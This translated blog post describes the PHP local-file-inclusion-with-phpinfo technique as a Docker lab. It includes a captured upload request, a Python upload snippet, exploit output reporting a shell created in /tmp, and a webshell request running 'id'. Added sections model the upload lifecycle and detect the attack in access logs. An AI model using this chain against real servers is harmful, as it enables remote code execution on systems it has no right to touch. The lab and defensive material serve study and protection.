PHP Local File Inclusion vulnerability: environment setup and exploitation analysis
0x00 Introduction
This post is about PHP local file inclusion (LFI) vulnerabilities. A related article was published on WooYun, and the LFI-with-phpinfo technique was first proposed abroad; the two papers linked below describe it. The principle of the exploit is this: a PHP POST upload causes the server to create a temporary file, phpinfo() reveals the path and name of that temporary file, and a local file inclusion vulnerability is then used to include it and generate a backdoor.
I tested the method successfully on my local machine. To make it easier to learn and to lower the cost of setting it up, I built a Docker environment for testing. With the built image running on an overseas VPS and the script from the poc folder of the lfi_phpinfo GitHub project run locally, getshell still succeeds, so the method is practical and does not place high demands on the network.
Docker Hub image address: janes/lfi_phpinfo
GitHub project address: lfi_phpinfo
The source code is kept in the code directory and can be reproduced with Docker; the poc directory holds the scripts.
Papers:
http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
0x01 PHP upload
Whenever a multipart POST request is sent to any PHP file on the server, a temporary file is generated, and the path and name of that temporary file can be found on the phpinfo page.
POST file upload
When a file is uploaded to PHP by POST, the server creates a temporary file to hold the file content.
To make file transfer convenient, the HTTP protocol defines a form-based method of transferring files.
The upload form must set enctype="multipart/form-data" and must use the POST method. See the PHP manual: file-upload.post-method.
The PHP engine handles a request with enctype="multipart/form-data" as follows:
When the request arrives, it creates a temporary file and writes the content of the uploaded file into it, then calls the requested PHP script to do its own processing (for example, checking the name and size of the temporary file), and finally deletes the temporary file when the request ends.
So the PHP engine saves the file content to a temporary file first and only then performs the script's operations. The temporary file name is "php" followed by random characters.
$_FILES holds the upload information, including the temporary file path and name
PHP has a superglobal variable $_FILES that stores information about the uploaded file: the original file name, the type, the temporary file name, the error code and the size.
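To make the lifecycle described above concrete, here is an added Python model of it (example code written for this page; it is not PHP's own rfc1867 implementation and not part of the lfi_phpinfo project). It parses a constructed multipart/form-data body that uses the same field names as the captured request, writes each file part to a "php"-prefixed temporary file before any script runs, builds a $_FILES-style dict, runs a stand-in for the requested script, and removes the temporary file when the request ends. The boundary, the body content and the `script` callback are constructed assumptions; PHP's real temporary name is "php" plus six random characters, whereas Python's mkstemp uses a longer random suffix.

```python
import os
import re
import tempfile

# Constructed sample body (not the page's capture): the same field names as the
# captured request, a file part named "file" and a text part named "submit".
BOUNDARY = "----ConstructedBoundary1234567890"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="file"; filename="file.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "hello from a constructed upload\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="submit"\r\n'
    "\r\n"
    "Submit\r\n"
    f"--{BOUNDARY}--\r\n"
).encode()


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (disposition params, headers, data) parts."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:          # anything before the first delimiter is preamble
        if chunk.startswith(b"--"):              # closing delimiter: "--boundary--"
            break
        if chunk.startswith(b"\r\n"):            # CRLF that ends the delimiter line
            chunk = chunk[2:]
        header_blob, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):               # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for line in header_blob.decode("latin-1").split("\r\n"):
            name, sep, value = line.partition(":")
            if sep:
                headers[name.strip().lower()] = value.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append((params, headers, data))
    return parts


def handle_upload(body, boundary, tmp_dir):
    """Model of the engine's rfc1867 step: file parts are written to temporary files
    before any script runs, and a $_FILES-like dict describes each of them."""
    files, post = {}, {}
    for params, headers, data in parse_multipart(body, boundary):
        field = params.get("name", "")
        if "filename" in params:
            # PHP names these "php" + 6 random chars; mkstemp uses a longer random suffix
            fd, tmp_name = tempfile.mkstemp(prefix="php", dir=tmp_dir)
            with os.fdopen(fd, "wb") as fh:
                fh.write(data)
            files[field] = {"name": params["filename"], "type": headers.get("content-type", ""),
                            "tmp_name": tmp_name, "error": 0, "size": len(data)}
        else:
            post[field] = data.decode("utf-8", "replace")
    return files, post


def run_request(body, boundary, tmp_dir, script):
    """Whole request lifecycle: upload handling, then the script, then removal of every
    temporary file the script did not move elsewhere (PHP's move_uploaded_file)."""
    files, post = handle_upload(body, boundary, tmp_dir)
    try:
        return script(files, post)
    finally:
        for info in files.values():
            if os.path.exists(info["tmp_name"]):
                os.remove(info["tmp_name"])


def demo():
    """Run one request against a hypothetical script and report what it observed."""
    with tempfile.TemporaryDirectory() as tmp_dir:
        def script(files, post):                 # stand-in for the PHP script being requested
            info = files["file"]
            return {"tmp_name": info["tmp_name"], "size": info["size"],
                    "submit": post["submit"],
                    "existed_during_request": os.path.exists(info["tmp_name"])}
        result = run_request(SAMPLE_BODY, BOUNDARY, tmp_dir, script)
        result["exists_after_request"] = os.path.exists(result["tmp_name"])
        return result


if __name__ == "__main__":
    print(demo())
```

The point the model makes is the timing: the temporary file exists for the whole lifetime of the request, regardless of whether the script does anything with $_FILES, and disappears only when the request finishes. That window is what the technique described in this post depends on, and it is why a phpinfo() page that echoes $_FILES is worth removing from any reachable server.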
0x02 Manually testing phpinfo() to obtain the temporary file path
HTML form
The form is upload.html: it contains a file input named "file" and a submit button named "submit", and posts to phpinfo.php with enctype="multipart/form-data" (the fields are visible in the captured request below).
Open upload.html in the browser and upload the file file.txt.
The POST request as captured in Burp:

```
POST /LFI_phpinfo/phpinfo.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/LFI_phpinfo/upload.html
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112
Content-Length: 368

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

-----------------------------11008921013555437861019615112
Content-Disposition: form-data; name="submit"

Submit
-----------------------------11008921013555437861019615112--
```

When accessed from the browser, phpinfo shows the following:

```
_REQUEST["submit"]  Submit
_POST["submit"]     Submit
_FILES["file"]      Array
(
    [name] => file.txt
    [type] => text/plain
    [tmp_name] => /tmp/phpufdCHh
    [error] => 0
    [size] => 33
)
```

From this we obtain the tmp_name path.
0x03 Uploading a file with a Python script

```python
import requests

host = '127.0.0.1'
url = 'http://{ip}/LFI_phpinfo/phpinfo.php'.format(ip=host)
file_ = '/var/www/LFI_phpinfo/file.txt'
# Any multipart POST to a PHP page creates a temporary file; phpinfo() shows its tmp_name
with open(file_, 'rb') as fh:
    response = requests.post(url, files={"name": fh})
print(response.text)
```

Part of the returned output:

```
_FILES["name"]
Array
(
    [name] => file.txt
    [type] =>
    [tmp_name] => /tmp/php7EvBv3
    [error] => 0
    [size] => 33
)
```

0x04 Local environment test
Get shell
```
$ python lfi_phpinfo.py 127.0.0.1
LFI with phpinfo()
==============================
INFO:__main__: getting initial offset...
INFO:__main__: found [tmp_name] at 67801
INFO:__main__: Got it! Shell created in /tmp/g
INFO:__main__: Wowo! \m/
INFO:__main__: Shutting down...
```

Accessing it from Firefox:

```
http://127.0.0.1/LFI_phpinfo/lfi.php?load=/tmp/gc&f=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

This shows that getshell succeeded and the shell can be used freely from here on ~~
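From the defender's side, the sequence above leaves a recognisable trace in the web server's access log: a burst of POSTs to a page that exposes phpinfo(), followed within a short window by a request whose parameter points at a path under /tmp. The following added Python example (written for this page; not part of the lfi_phpinfo project) runs that detection logic over constructed Apache combined-format log lines modelled on the requests shown in this post. The addresses, timestamps, user agents, the 60-second window and the threshold of five POSTs are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not real traffic): six rapid POSTs to the
# phpinfo page, then requests that include paths under /tmp, plus two benign requests.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Mar/2016:10:00:00 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:01 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:02 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:03 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:04 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:05 +0000] "POST /LFI_phpinfo/phpinfo.php HTTP/1.1" 200 68123 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:06 +0000] "GET /LFI_phpinfo/lfi.php?load=/tmp/phpufdCHh HTTP/1.1" 200 12 "-" "python-requests/2.9.1"
127.0.0.1 - - [01/Mar/2016:10:00:07 +0000] "GET /LFI_phpinfo/lfi.php?load=/tmp/gc&f=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Mar/2016:10:00:08 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Mar/2016:10:00:09 +0000] "POST /upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# PHP's default upload_tmp_dir is /tmp; the post shows both /tmp/phpXXXXXX and /tmp/gc
TMP_RE = re.compile(r"^/tmp/")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def detect(lines, window=timedelta(seconds=60), post_threshold=5):
    """Return alerts for (a) a request whose parameter names a /tmp path shortly after
    POSTs to a phpinfo page from the same source, and (b) a burst of such POSTs."""
    by_ip = defaultdict(lambda: {"phpinfo_posts": [], "tmp_includes": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bucket = by_ip[rec["ip"]]
        if rec["method"] == "POST" and "phpinfo" in rec["path"].lower():
            bucket["phpinfo_posts"].append(rec["ts"])
        for _, value in rec["query"]:
            if TMP_RE.match(value):
                bucket["tmp_includes"].append((rec["ts"], rec["path"], value))
    alerts = []
    for ip, bucket in by_ip.items():
        for ts, path, value in bucket["tmp_includes"]:
            recent = [p for p in bucket["phpinfo_posts"] if ts - window <= p <= ts]
            if recent:
                alerts.append({"ip": ip, "reason": "include of /tmp path after phpinfo POSTs",
                               "path": path, "value": value, "phpinfo_posts": len(recent)})
        if len(bucket["phpinfo_posts"]) >= post_threshold:
            alerts.append({"ip": ip, "reason": "burst of POSTs to phpinfo page",
                           "count": len(bucket["phpinfo_posts"])})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample above this reports two include alerts and one burst alert, all for 127.0.0.1, and nothing for the benign host. The burst rule matters because the race the script runs needs many upload attempts before one include lands; a single POST to phpinfo.php is noise, dozens in a minute are not. The cheaper fix is still to remove phpinfo() pages from production and to make the including script accept only an allowlisted set of file names rather than a path from the query string.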
0x05 Using Docker to build the environment
The basics of Docker are not covered here; search for them yourself. Two image sources are offered: build the image yourself from the Dockerfile in the lfi_phpinfo GitHub project, or use the image janes/lfi_phpinfo that I have already built.
Image source
- php:5.6-apache
or
- janes/lfi_phpinfo
Building the environment and running the test
Get the source code of the lfi_phpinfo GitHub project, switch to the web directory, and build the environment for testing. Three ways to run it are given here.
Method 1: run the test with the official PHP image

```
docker run --rm -v code/:/var/www/html -p 80:80 php:5.6-apache
```

Method 2: run the test with the pre-built image janes/lfi_phpinfo

```
docker pull "janes/lfi_phpinfo"
docker run --rm -p "80:80" janes/lfi_phpinfo
```

Method 3: use docker-compose

```
docker-compose up
```

Then run the Python script to get a shell.

```
python lfi_phpinfo.py docker_host_ip
```

0x06 Conclusion
Working through LFI with phpinfo is not as smooth as reading the article makes it seem. Along the way you may run into environment-related problems that take real effort to solve, and that is what gave me the idea of using Docker to build a test environment, in the hope of offering a more convenient learning setup to those who love network security. Finally, I would like to thank the author of the article "LFI with PHPInfo local test process", which helped me a great deal in studying LFI with phpinfo.